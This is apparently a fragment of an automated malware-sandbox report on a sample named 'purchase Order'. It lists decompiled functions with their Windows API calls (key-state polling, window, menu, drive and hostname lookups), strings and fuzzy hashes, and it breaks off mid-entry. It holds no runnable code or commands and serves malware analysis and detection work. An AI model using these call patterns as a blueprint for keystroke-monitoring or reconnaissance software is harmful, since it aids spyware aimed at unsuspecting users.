GetAsyncKeyState.USER32(00000011), ref: 00C82FE4
GetKeyState.USER32(00000011), ref: 00C82FF2
GetAsyncKeyState.USER32(00000012), ref: 00C8301B
GetKeyState.USER32(00000012), ref: 00C83029
GetAsyncKeyState.USER32(0000005B), ref: 00C83052
GetKeyState.USER32(0000005B), ref: 00C83060

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 2eef0013eeecf1fabc96b10773c81220a0999c0e8d57003dbe38239b968cb3ce
Instruction ID: 1fbdc2e2128ae3136db20a8466dd89c238c88a15a26aaab22c333c5cb99dd230
Opcode Fuzzy Hash: 2eef0013eeecf1fabc96b10773c81220a0999c0e8d57003dbe38239b968cb3ce
Instruction Fuzzy Hash: ED51F570A087D829FB35FBA488047EEBBF45F11748F08459EC5D25A1C2DB549B8CC7AA

Function 00C7ED02 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00C7ED1E
GetWindowRect.USER32(00000000,?), ref: 00C7ED30
MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00C7ED8E
GetDlgItem.USER32(?,00000002), ref: 00C7ED99
GetWindowRect.USER32(00000000,?), ref: 00C7EDAB
MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00C7EE01
GetDlgItem.USER32(?,000003E9), ref: 00C7EE0F
GetWindowRect.USER32(00000000,?), ref: 00C7EE20
MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00C7EE63
GetDlgItem.USER32(?,000003EA), ref: 00C7EE71
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00C7EE8E
InvalidateRect.USER32(?,00000000,00000001), ref: 00C7EE9B

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: e528252a202cf35b1a1ec33074ebddd405c366952eb0b6a8b3e49c3f3f409817
Instruction ID: ea1d73e277afbcc02dc06eff44a1e91425e73c8ee59fb2b52942574379f8e2c1
Opcode Fuzzy Hash: e528252a202cf35b1a1ec33074ebddd405c366952eb0b6a8b3e49c3f3f409817
Instruction Fuzzy Hash: 1A510FB1B00205AFDB18CF69DD85FAEBBBAEB88701F148569F51AD7290D7709E00CB10

Function 00C5B73E Relevance: 18.2, APIs: 12, Instructions: 170timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C5B759,?,00000000,?,?,?,?,00C5B72B,00000000,?), ref: 00C5BA58

DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00C5B72B), ref: 00C5B7F6
KillTimer.USER32(00000000,?,00000000,?,?,?,?,00C5B72B,00000000,?,?,00C5B2EF,?,?), ref: 00C5B88D
DestroyAcceleratorTable.USER32(00000000), ref: 00CBD8A6
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C5B72B,00000000,?,?,00C5B2EF,?,?), ref: 00CBD8D7
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C5B72B,00000000,?,?,00C5B2EF,?,?), ref: 00CBD8EE
ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00C5B72B,00000000,?,?,00C5B2EF,?,?), ref: 00CBD90A
DeleteObject.GDI32(00000000), ref: 00CBD91C

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
String ID:
API String ID: 641708696-0
Opcode ID: 496bb245191aa2b16f96dd7f56b952f19ef28f4263dd0aa3254be7dc89ec776c
Instruction ID: e0b31200f84369156a86c739c603728723257079f4c1f393e027f58a8759496a
Opcode Fuzzy Hash: 496bb245191aa2b16f96dd7f56b952f19ef28f4263dd0aa3254be7dc89ec776c
Instruction Fuzzy Hash: 0261AD38501700CFDB258F19DC88B69BBB5FB94312F14052DE85B87AA0CB71ADC4DBA8

Function 00C5B40A Relevance: 18.1, APIs: 12, Instructions: 131COMMON

Download Yara Rule

APIs

Part of subcall function 00C5B526: GetWindowLongW.USER32(?,000000EB), ref: 00C5B537

GetSysColor.USER32(0000000F), ref: 00C5B438

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ColorLongWindow
String ID:
API String ID: 259745315-0
Opcode ID: 150fb007b16010eec1e554d75c2948e299d294d56000e0e4dece848e692e0cc0
Instruction ID: ee229e1d2ea38ea946b2d480abaa09adf97174763a639961c37b7de6967fdd8d
Opcode Fuzzy Hash: 150fb007b16010eec1e554d75c2948e299d294d56000e0e4dece848e692e0cc0
Instruction Fuzzy Hash: C541AF39000144AFDB305F28DC89BBD3B66AB46732F188265FD768A1E6D7308D86DB25

Function 00C8690B Relevance: 18.1, APIs: 12, Instructions: 113COMMON

Download Yara Rule

APIs

_wcschr.LIBCMT ref: 00C86923
_wcscpy.LIBCMT ref: 00C86934
__wsplitpath.LIBCMT ref: 00C86958
__wsplitpath.LIBCMT ref: 00C86979
_wcscpy.LIBCMT ref: 00C8699B
_wcscpy.LIBCMT ref: 00C869B9
_wcscpy.LIBCMT ref: 00C869C7
_wcscat.LIBCMT ref: 00C869D6
_wcscat.LIBCMT ref: 00C86A2B
_wcscat.LIBCMT ref: 00C86A61
_wcscat.LIBCMT ref: 00C86A73

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
String ID:
API String ID: 136442275-0
Opcode ID: 9e71ac82b8626119f7251e35f42376d7bdc9f516ed1ac60ea6892e90add5a56f
Instruction ID: 9c88afb36cd9790631c81364b6fc0392b536303bfb019205832e7a6c25c763c2
Opcode Fuzzy Hash: 9e71ac82b8626119f7251e35f42376d7bdc9f516ed1ac60ea6892e90add5a56f
Instruction Fuzzy Hash: 1D411D7688521CAECF65EB94CC85DDB73BCEB44300F1041A6B659A2051EB30ABE59F54

Function 00C8D76A Relevance: 17.7, APIs: 3, Strings: 7, Instructions: 180COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00CDDC00,00CDDC00,00CDDC00), ref: 00C8D7CE
GetDriveTypeW.KERNEL32(?,00CF3A70,00000061), ref: 00C8D898
_wcscpy.LIBCMT ref: 00C8D8C2

Strings

fixed, xrefs: 00C8D816
network, xrefs: 00C8D82C
removable, xrefs: 00C8D800
all, xrefs: 00C8D7D4
ramdisk, xrefs: 00C8D842
unknown, xrefs: 00C8D859
cdrom, xrefs: 00C8D7EA

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: BuffCharDriveLowerType_wcscpy
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2820617543-1000479233
Opcode ID: 53bac0397bce31d0ede19f2747eac1478d0f9be9e593a304c0136ee38ebfabbd
Instruction ID: 9bbaf9598273f64c7b32f54ce430d9f8102a6f8f865448150f9216ec1634a4a9
Opcode Fuzzy Hash: 53bac0397bce31d0ede19f2747eac1478d0f9be9e593a304c0136ee38ebfabbd
Instruction Fuzzy Hash: A3519F35104244AFC704FF14D881A6EB7A5EF85318F10882DF9AA572E2DB31EE49DB86

Function 00CAB33A Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00CAB3F4

Strings

@U=u, xrefs: 00CAB42A

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: InvalidateRect
String ID: @U=u
API String ID: 634782764-2594219639
Opcode ID: 4044ce4a1622e550f3867abce1d101ebf66c8344d28436bfb6e9f85497667fdb
Instruction ID: 33b46e2563aaaa5c673e7f84ad9334b9af3bc3edc07541baffe7ab096f6ecdcb
Opcode Fuzzy Hash: 4044ce4a1622e550f3867abce1d101ebf66c8344d28436bfb6e9f85497667fdb
Instruction Fuzzy Hash: 05518F34501206BEEF209F29CD89BAD3B64AF0631CF644515FA25D62E3CB71EE909B51

Function 00C5A699 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00CBDB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00CBDB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00CBDB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00CBDB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00CBDB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,00C5A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00CBDBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00CBDBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,00C5A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 00CBDBC8

Strings

@U=u, xrefs: 00CBDB7A

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID: @U=u
API String ID: 1268354404-2594219639
Opcode ID: 380ceed0a84cb53fc92e727a0dcf6ed00bf9347558378eb043d14b035eb95575
Instruction ID: 6306bc2e398759ae538ac224cc3bd255c74b0e6080521d4a59515d72db317e62
Opcode Fuzzy Hash: 380ceed0a84cb53fc92e727a0dcf6ed00bf9347558378eb043d14b035eb95575
Instruction Fuzzy Hash: 76518B74600309EFDB24DF2ACC81FAA77B8FB08751F100628F95697290EBB0AD84DB54

Function 00C4936C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00C493AB
__itow.LIBCMT ref: 00C493DF

Part of subcall function 00C61557: _xtow@16.LIBCMT ref: 00C61578

Strings

True, xrefs: 00CB4C8C
%.15g, xrefs: 00C493A5
False, xrefs: 00CB4C93
0x%p, xrefs: 00CB4CAD

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: __itow__swprintf_xtow@16
String ID: %.15g$0x%p$False$True
API String ID: 1502193981-2263619337
Opcode ID: 9e38ff227ee12bc15c8cc3f20a90eaf952005fa2c8caedde651a0f18babe2b60
Instruction ID: 528035f7ad7004f9a1356d7de0c9190c8b07a41e021ee30db0d736a902e54120
Opcode Fuzzy Hash: 9e38ff227ee12bc15c8cc3f20a90eaf952005fa2c8caedde651a0f18babe2b60
Instruction Fuzzy Hash: 2241E531508214ABDB28DF74D982EBAB7E8FF45300F24446EE55AD71D2EA31DA41DB11

Function 00C7B907 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C7B98C
GetDlgCtrlID.USER32 ref: 00C7B997
GetParent.USER32 ref: 00C7B9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C7B9B6
GetDlgCtrlID.USER32(?), ref: 00C7B9BF
GetParent.USER32(?), ref: 00C7B9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 00C7B9DE

Strings

@U=u, xrefs: 00C7B9DE
ComboBox, xrefs: 00C7B911
ListBox, xrefs: 00C7B949

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: @U=u$ComboBox$ListBox
API String ID: 1383977212-2258501812
Opcode ID: 60702db41601b39a251b9521676225272f6572223b088378e6975f62c821ff41
Instruction ID: 3615eb0e373e6ad2578d2930546fa741b7b906a981fad88e2f3a00860b2c37f4
Opcode Fuzzy Hash: 60702db41601b39a251b9521676225272f6572223b088378e6975f62c821ff41
Instruction Fuzzy Hash: B421C5B5900108BFDB04ABA4CC86FFEBB79EF49310F104129F666932E1DB749915EB20

Function 00C7B9F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C7BA73
GetDlgCtrlID.USER32 ref: 00C7BA7E
GetParent.USER32 ref: 00C7BA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 00C7BA9D
GetDlgCtrlID.USER32(?), ref: 00C7BAA6
GetParent.USER32(?), ref: 00C7BAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 00C7BAC5

Strings

@U=u, xrefs: 00C7BAC5
ComboBox, xrefs: 00C7B9FA
ListBox, xrefs: 00C7BA32

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: @U=u$ComboBox$ListBox
API String ID: 1383977212-2258501812
Opcode ID: ffe670861b6681f96f319e9a51988a1831a18a24fab2385f09d654aad68ac2db
Instruction ID: 7c4e1bc9c561abcc04130cf8d644d0f1374db86647d63b4e6a602b24fceab611
Opcode Fuzzy Hash: ffe670861b6681f96f319e9a51988a1831a18a24fab2385f09d654aad68ac2db
Instruction Fuzzy Hash: E72192B4A40208BFDB41ABA4CC85FFEBB79EF45300F104025F956A71A1DB75991AEB20

Function 00C86F02 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 72networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00C86F1D
gethostname.WSOCK32(?,00000100), ref: 00C86F37
gethostbyname.WSOCK32(?), ref: 00C86F44
_wcscpy.LIBCMT ref: 00C86F6C
inet_ntoa.WSOCK32(?), ref: 00C86F8A
_strcat.LIBCMT ref: 00C86F98
_wcscpy.LIBCMT ref: 00C86FAF
WSACleanup.WSOCK32 ref: 00C86FBD
_wcscpy.LIBCMT ref: 00C86FCB

Strings

0.0.0.0, xrefs: 00C86F66

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 2620052-3771769585
Opcode ID: 019750649c01fd7b00ce5d391a4004aef3c00d9808d2a19e35a5303c1e5c7e0d
Instruction ID: 433754fecd897f88d927ca93605e591136451377ace6c8446059d414fa0dabf1
Opcode Fuzzy Hash: 019750649c01fd7b00ce5d391a4004aef3c00d9808d2a19e35a5303c1e5c7e0d
Instruction Fuzzy Hash: B0112431908114ABCB25BBB0EC4AFDE77ACEF40714F100175F216A2081EF70DA859B54

Function 00C7BAD7 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00C7BAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 00C7BAF8
_wcscmp.LIBCMT ref: 00C7BB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C7BB85

Strings

largeicons, xrefs: 00C7BB19
smallicons, xrefs: 00C7BB4D
@U=u, xrefs: 00C7BB85
SHELLDLL_DefView, xrefs: 00C7BB04
details, xrefs: 00C7BB33
list, xrefs: 00C7BB67

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: @U=u$SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-1428604138
Opcode ID: 51c17f2f393a8b1e5a2ce454afaf4007dcb95b40e6abdfae74e0a11db4f45545
Instruction ID: ba9634e8d0b1d28b52beb5f7fa58d1418e580d7ea930039f51c478dee213ce97
Opcode Fuzzy Hash: 51c17f2f393a8b1e5a2ce454afaf4007dcb95b40e6abdfae74e0a11db4f45545
Instruction Fuzzy Hash: 4E110276648307FBFA206635EC07FBB779C9B11724B204032FE19E50D9EBA1AD11A515

Function 00C6500E Relevance: 16.8, APIs: 11, Instructions: 257COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C65047

Part of subcall function 00C67C0E: __getptd_noexit.LIBCMT ref: 00C67C0E

__gmtime64_s.LIBCMT ref: 00C650E0
__gmtime64_s.LIBCMT ref: 00C65116
__gmtime64_s.LIBCMT ref: 00C65133
__allrem.LIBCMT ref: 00C65189
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C651A5
__allrem.LIBCMT ref: 00C651BC
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C651DA
__allrem.LIBCMT ref: 00C651F1
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C6520F
__invoke_watson.LIBCMT ref: 00C65280

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
String ID:
API String ID: 384356119-0
Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction ID: 4799bd4b58b89f5f75c93c6b36c6716f874ee729ded888da09718ada26c70619
Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
Instruction Fuzzy Hash: 9671D872A00F17ABD7349E79CCD1B5A73A8AF01764F248229F924D7681E770DE409BD0

Function 00C84DDD Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C84DF8
GetMenuItemInfoW.USER32(00D01708,000000FF,00000000,00000030), ref: 00C84E59
SetMenuItemInfoW.USER32(00D01708,00000004,00000000,00000030), ref: 00C84E8F
Sleep.KERNEL32(000001F4), ref: 00C84EA1
GetMenuItemCount.USER32(?), ref: 00C84EE5
GetMenuItemID.USER32(?,00000000), ref: 00C84F01
GetMenuItemID.USER32(?,-00000001), ref: 00C84F2B
GetMenuItemID.USER32(?,?), ref: 00C84F70
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C84FB6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C84FCA
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C84FEB

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 96d17b6db35fa7346c9ba203aa89d23cabc2e172d7285263017288efd0fb8d0a
Instruction ID: 75bc23d2b3f96a6cc3448d43dbaab58f5d23c4c8a43dbe5501dcda2fae255063
Opcode Fuzzy Hash: 96d17b6db35fa7346c9ba203aa89d23cabc2e172d7285263017288efd0fb8d0a
Instruction Fuzzy Hash: 7361AFB190024AAFDB25EFA4DC88EAEBBB8FB0530CF14005DF552A7251D770AE45DB24

Function 00CA9C16 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00CA9C98
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00CA9C9B
GetWindowLongW.USER32(?,000000F0), ref: 00CA9CBF
_memset.LIBCMT ref: 00CA9CD0
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00CA9CE2
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00CA9D5A

Memory Dump Source

